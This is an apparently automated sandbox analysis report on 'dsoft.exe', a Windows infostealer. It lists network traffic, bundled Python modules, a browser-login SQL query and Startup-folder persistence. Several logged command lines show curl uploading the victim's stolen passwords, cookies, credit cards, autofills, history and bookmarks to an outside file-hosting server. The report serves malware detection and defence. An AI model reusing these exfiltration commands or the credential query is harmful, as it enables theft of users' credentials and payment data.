0000000E.00000003.2678643539.000001FA5C18D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2677190879.000001FA5C189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com)
Source: dsoft.exe, 00000001.00000002.2568873435.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895E4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com)z

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900

Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.4:49805 version: TLS 1.2

Source: dsoft.exe	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
Source: _overlapped.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: dsoft.exe.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
Source: _overlapped.pyd.10.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.10.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: dsoft.exe, 00000000.00000003.1997172891.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshell.pyd0 vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1989600243.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibsslH vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1993838647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1991278699.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepythoncom310.dll0 vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1986037368.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1986770676.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1994313352.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1987314194.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_uuid.pyd. vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1986609914.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_multiprocessing.pyd. vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1984920843.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewin32ui.pyd0 vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1996740060.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewin32trace.pyd0 vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1995076039.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_win32sysloader.pyd0 vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1987164088.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1986492471.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1986962880.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1991995778.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepywintypes310.dll0 vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1985736440.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1996740060.00000177161F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewin32trace.pyd0 vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1986688582.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_overlapped.pyd. vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1995076039.00000177161F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_win32sysloader.pyd0 vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1985304722.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1992158737.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1986235896.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1985477905.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140_1.dllT vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1986386897.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1989868193.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepyexpat.pyd. vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1986851728.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1995267328.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewin32api.pyd0 vs dsoft.exe
Source: dsoft.exe, 00000000.00000003.1985604407.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_asyncio.pyd. vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2168703723.000001463F1F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_win32sysloader.pyd0 vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2168910308.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewin32trace.pyd0 vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2168802143.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewin32api.pyd0 vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2166448280.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepywintypes310.dll0 vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2166184216.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepythoncom310.dll0 vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2161237903.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2159039587.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2159279158.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_asyncio.pyd. vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2159661243.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2159815158.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2167603428.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2164416315.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepyexpat.pyd. vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2161628059.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_uuid.pyd. vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2160421599.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_overlapped.pyd. vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2168703723.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_win32sysloader.pyd0 vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2168910308.000001463F1F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewin32trace.pyd0 vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2159977076.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2159384277.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2169044397.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshell.pyd0 vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2164088511.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibsslH vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2158724693.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewin32ui.pyd0 vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2161501868.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2168290335.000001463F1F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2166596083.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2160261628.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_multiprocessing.pyd. vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2160557351.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2160087254.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2160707465.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs dsoft.exe
Source: dsoft.exe, 0000000A.00000003.2159177221.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140_1.dllT vs dsoft.exe

Source: classification engine

Classification label: mal92.troj.adwa.spyw.winEXE@81/183@5/6

Source: C:\Users\user\Desktop\dsoft.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1900:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1988:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3796:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2360:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:792:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1748:120:WilError_03

Source: C:\Users\user\Desktop\dsoft.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI69562

Jump to behavior

Source: dsoft.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\dsoft.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: SELECT action_url, username_value, password_value FROM logins;

Source: dsoft.exe

ReversingLabs: Detection: 34%

Source: C:\Users\user\Desktop\dsoft.exe

File read: C:\Users\user\Desktop\dsoft.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\dsoft.exe "C:\Users\user\Desktop\dsoft.exe"
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Users\user\Desktop\dsoft.exe "C:\Users\user\Desktop\dsoft.exe"
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe"
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
